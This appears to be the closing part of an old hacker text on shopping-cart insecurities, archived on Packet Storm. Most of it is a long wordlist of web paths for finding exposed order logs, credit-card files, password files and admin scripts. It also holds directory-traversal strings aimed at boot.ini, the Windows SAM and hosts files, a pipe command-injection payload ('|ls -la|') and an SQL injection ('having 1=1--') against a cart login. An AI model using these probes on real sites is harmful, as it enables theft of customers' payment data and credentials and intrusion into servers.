/cgi-bin/form/mail.cgi
/ibill/mypins/
/cgi-bin/awstats.pl%3Flang%3Dnl
/cgibin/allmanage_admin.pl
/cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords
/cg-ibin/admin_files/
/cgibin/cart/comersus.mdb
/cg-bin/eshop/database/order.mdb
/cgibin/htt
/cgibin/phf
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den
/database/eipc.mdb
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/script/shop/shopping350.mdb
/cgibin/shopping350.mdb
/cg-bin/eshop/en/database/credit.mdb
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den
/cgi-bin/add-passwd.cgi
/logs/200306/charleston.com/
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/cgibin/store/log_files/your_order.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=neworder.log
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/awstats.pl%3Flang%3Dfr%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl
/cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail
/cgibin/mailform.pl
/cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords
/cgi-bin/shop/shopping350.mdb
/cgibin/cart/database/comersus.mdb
/dbase/date.
/www.gambling-01.co.uk/cgibin/password.txt
/cgibin/awstats.pl%3Flang%3Des
/ccbill/ccbill.log
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde
/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit
/cgibin/index%20of
/cgi-bin/form1.cgi
/cc.txt
/cgibin/awstats.pl%3Flang%3Den%26update%3D1
/cg/./comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Foutput%3Dkeyphrases
/cgibin/webshop/templates/cc.txt
/....../ all
/....../config.sys
/....../etc/hosts
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htaccess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples/config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin/UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin/glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin/htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin/mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin/postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin/search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin/textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/userfile.dat
/cgi-bin/view-source
/cgi-bin/visadmin.exe
/cgi-bin/w3-msql/
/cgi-bin/webbbs.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webplus
/cgi-bin/websendmail
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/whois_raw.cgi
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/www-sql
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.pl
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-local
/cgi-shl/win-c-sample.exe
/cgi-src
/cgi-src/phf.c
/cgi-win
/cgi-win/uploader.exe
/cgibin
/com1
/com2
/com3
/com4
/con/con
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/default.asp.
/default.asp::$DATA
/doc
/iisadmpwd/aexp2.htr
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/iissamples/query.asp
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/sdk/asp/docs/codebrws.asp
/log
/logs
/mall_log_files/order.log
/manage/cgi/cgiproc
/msadc/Samples/SELECTOR/showcode.asp
/msadc/msadcs.dll
/msads/Samples/SELECTOR/showcode.asp
/ncl_items.html
/order/order.log
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/orders/order.log
/orders/orders.txt
/ping all
/ping?SomeCrapHere
/piranha/secure/passwd.php3
/pw/storemgr.pw
/quikstore.cfg
/samples/search/queryhit.htm
/scripts
/scripts/CGImail.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe/cart32clientlist
/scripts/cmd.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/dbman/db.cgi?db=invalid-db
/scripts/emurl/RECMAN.dll
/scripts/fpcount.exe
/scripts/iisadmin/ism.dll?http/dir
/scripts/issadmin/bdir.htr
/scripts/no-such-file.pl
/scripts/proxy/w3proxy.dll
/scripts/slxweb.dll
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/uploadn.asp
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wsisa.dll
/search97.vts
/server-status
/showfile.asp
/ssi/envout.bat
/ws_ftp.ini
/~
/~bin
/~guest
/~log
/~logs
/~lp
/~named
/~root
/~test
/~tmp
--
Most of all shopping carts are vuln in one way or another, its just finding a
way around them, if the admins were to set the right permissions, just
being smart is the key.
That concludes The explaination of Shopping Carts and their insecurities.
Merry Christmas.
Login or Register to add favorites
* Follow us on Twitter
* Follow us on Facebook
* Subscribe to an RSS Feed
FILE ARCHIVE:
SEPTEMBER 2024
<
* Su
* Mo
* Tu
* We
* Th
* Fr
* Sa
* 1
Sep 1st
261 Files
* 2
Sep 2nd
17 Files
* 3
Sep 3rd
38 Files
* 4
Sep 4th
52 Files
* 5
Sep 5th
23 Files
* 6
Sep 6th
27 Files
* 7
Sep 7th
0 Files
* 8
Sep 8th
1 Files
* 9
Sep 9th
16 Files
* 10
Sep 10th
38 Files
* 11
Sep 11th
0 Files
* 12
Sep 12th
0 Files
* 13
Sep 13th
0 Files
* 14
Sep 14th
0 Files
* 15
Sep 15th
0 Files
* 16
Sep 16th
0 Files
* 17
Sep 17th
0 Files
* 18
Sep 18th
0 Files
* 19
Sep 19th
0 Files
* 20
Sep 20th
0 Files
* 21
Sep 21st
0 Files
* 22
Sep 22nd
0 Files
* 23
Sep 23rd
0 Files
* 24
Sep 24th
0 Files
* 25
Sep 25th
0 Files
* 26
Sep 26th
0 Files
* 27
Sep 27th
0 Files
* 28
Sep 28th
0 Files
* 29
Sep 29th
0 Files
* 30
Sep 30th
0 Files
*
*
*
*
*
TOP AUTHORS IN LAST 30 DAYS
* Red Hat 270 files
* indoushka 155 files
* Jay Turla 150 files
* Ubuntu 66 files
* h00die 54 files
* juan vazquez 43 files
* sinn3r 41 files
* H D Moore 31 files
* Karn Ganeshen 23 files
* Debian 22 files
FILE TAGS
* ActiveX (933)
* Advisory (86,715)
* Arbitrary (17,039)
* BBS (2,859)
* Bypass (1,912)
* CGI (1,047)
* Code Execution (7,883)
* Conference (692)
* Cracker (844)
* CSRF (3,421)
* DoS (25,210)
* Encryption (2,394)
* Exploit (54,158)
* File Inclusion (4,272)
* File Upload (1,009)
* Firewall (822)
* Info Disclosure (2,912)
* Intrusion Detection (918)
* Java (3,155)
* JavaScript (908)
* Kernel (7,258)
* Local (14,836)
* Magazine (587)
* Overflow (13,208)
* Perl (1,435)
* PHP (5,254)
* Proof of Concept (2,404)
* Protocol (3,749)
* Python (1,655)
* Remote (31,841)
* Root (3,669)
* Rootkit (529)
* Ruby (640)
* Scanner (1,657)
* Security Tool (8,045)
* Shell (3,299)
* Shellcode (1,219)
* Sniffer (904)
* Spoof (2,292)
* SQL Injection (16,709)
* TCP (2,463)
* Trojan (690)
* UDP (919)
* Virus (672)
* Vulnerability (33,057)
* Web (10,132)
* Whitepaper (3,783)
* x86 (969)
* XSS (18,282)
* Other
FILE ARCHIVES
* September 2024
* August 2024
* July 2024
* June 2024
* May 2024
* April 2024
* March 2024
* February 2024
* January 2024
* December 2023
* November 2023
* October 2023
* Older
SYSTEMS
* AIX (430)
* Apple (2,104)
* BSD (378)
* CentOS (61)
* Cisco (1,954)
* Debian (7,118)
* Fedora (1,693)
* FreeBSD (1,247)
* Gentoo (4,567)
* HPUX (881)
* iOS (387)
* iPhone (108)
* IRIX (220)
* Juniper (71)
* Linux (51,096)
* Mac OS X (696)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (489)
* RedHat (16,754)
* Slackware (941)
* Solaris (1,615)
* SUSE (1,444)
* Ubuntu (9,812)
* UNIX (9,453)
* UnixWare (188)
* Windows (6,765)
* Other
© 2024 Packet Storm. All rights reserved.
Site Links News by Month News Tags Files by Month File Tags File Directory
About Us History & Purpose Contact Information Terms of Service Privacy
Statement Copyright Information
Services Security Services Hosting By Rokasec
* Follow us on Twitter
* Follow us on Facebook
* Subscribe to an RSS Feed